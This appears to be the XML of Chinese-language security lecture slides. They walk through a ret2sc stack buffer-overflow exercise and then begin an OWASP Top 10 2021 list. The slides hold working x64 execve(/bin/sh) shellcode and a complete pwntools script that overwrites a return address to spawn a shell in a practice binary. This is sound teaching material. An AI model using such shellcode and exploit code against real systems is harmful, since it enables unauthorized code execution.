                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x00602000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為可寫入區段 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="箭號: 向右 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD41746A-F29E-48D7-9243-A05106E20656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957314" y="1711569"/>
            <a:ext cx="3182012" cy="150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D3A77B57-4105-4E84-B56A-F2B1EF5EEC33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5194915" y="1463863"/>
            <a:ext cx="1802167" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Name: a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x00601080</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1499289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69601" y="620072"/>
            <a:ext cx="2947858" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>Name:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>Try your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>best:s</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直線單箭頭接點 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855811" y="965189"/>
            <a:ext cx="18457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a:off x="5103715" y="1947324"/>
            <a:ext cx="18457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701544" y="761912"/>
            <a:ext cx="3817071" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Name:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>後送出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949448" y="1632967"/>
            <a:ext cx="5242552" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Try your best:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>後送出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>要蓋掉的部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>(0x20+0x8 = 0x28) +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>的位址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="直線單箭頭接點 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121854" y="3075906"/>
            <a:ext cx="8172" cy="20849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5112295" y="5338492"/>
            <a:ext cx="1911952" cy="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079706" y="5024416"/>
            <a:ext cx="2178657" cy="6281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Shell code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="群組 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4BA8D8D-B539-41D8-AB0C-FFCE6B39C9B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2686917" y="3084592"/>
            <a:ext cx="2337788" cy="2095692"/>
            <a:chOff x="4968681" y="1971417"/>
            <a:chExt cx="3595163" cy="3666057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="矩形 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9E5458-9B45-4945-9FBA-8006A8F872B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385187" y="5009321"/>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t>RETURN ADDRESS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7926B35F-5A5E-4D6B-8D24-9D7C52717A4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385187" y="4335936"/>
              <a:ext cx="2178657" cy="62815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Saved </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
                <a:t>rbp</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="矩形 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DC4C20-0954-42A0-B763-0901F1EB94E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385185" y="1971417"/>
              <a:ext cx="2178657" cy="23192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sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="矩形 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F74AA4B1-5E26-4873-B114-0086E1ECD51D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5212398" y="2970888"/>
              <a:ext cx="1070379" cy="646084"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
                <a:t>0x20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="矩形 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7072AE30-0BE6-4682-BF2C-0E772BDD707A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5316591" y="4290703"/>
              <a:ext cx="865770" cy="646084"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
                <a:t>0x8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="直線接點 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F4D660-43A8-4A5C-AB45-0A0BA2B60608}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968682" y="1993440"/>
              <a:ext cx="137372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22F4445D-60D9-4D51-AAA3-16C2F5CC4D01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968681" y="4290704"/>
              <a:ext cx="137372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383503EE-6C12-4735-BB7E-6C2E34FC6278}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968681" y="4959875"/>
              <a:ext cx="137372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2846047" y="5024416"/>
            <a:ext cx="2178657" cy="6281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Shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2593700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9084E-EA29-41CF-84CE-74E77797BA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" cap="none" dirty="0"/>
              <a:t>shell code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="內容版面配置區 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D9922E3-9156-425C-BFF0-97E5DED4871F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926102" y="2409682"/>
            <a:ext cx="7592485" cy="2038635"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{001B0091-2A43-4FE7-8CA8-BF9BF01B67DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6436664"/>
            <a:ext cx="9452499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Linux/x64 - execve(/bin/sh) Shellcode (23 bytes) (exploit-db.com)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2832648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B2966D-818F-4B6B-A413-7AEB2E2D8940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" cap="none" dirty="0"/>
              <a:t>exploit code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{695A417A-FFBB-4AA2-9F1D-2AB5CECC758F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>from pwn import * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r = process('./ret2sc') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shellcode ="\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.sendafter(':',shellcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shellcode_address = 0x601080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.recvuntil(':')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.sendline(b"a"*0x28 + p64(shellcode_address))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.interactive()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298C241E-7C8E-42EC-9D6F-B4A1942A2C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675726" y="5686261"/>
            <a:ext cx="7516274" cy="1171739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292949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65EC1A-4EB3-4745-9C66-28FFEB9D0A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>十大漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>owasp top 10 2021</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4341E97E-857F-4F2F-AECE-A62B98C002A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>權限控制失效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 訪問控制策略未能將帳號限制設定為預期的權限，容易讓駭客透過這項漏洞，進入企業中查看、修改、洩露、刪除其他帳號和管理員的數據，或是修改帳號和權限，甚至將惡意軟體安裝到系統中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Cryptographic Failures(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>加密機制失效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 密碼學相關的失效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>或缺乏加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，因此常常導致敏感資料的洩漏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Injection(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>注入攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
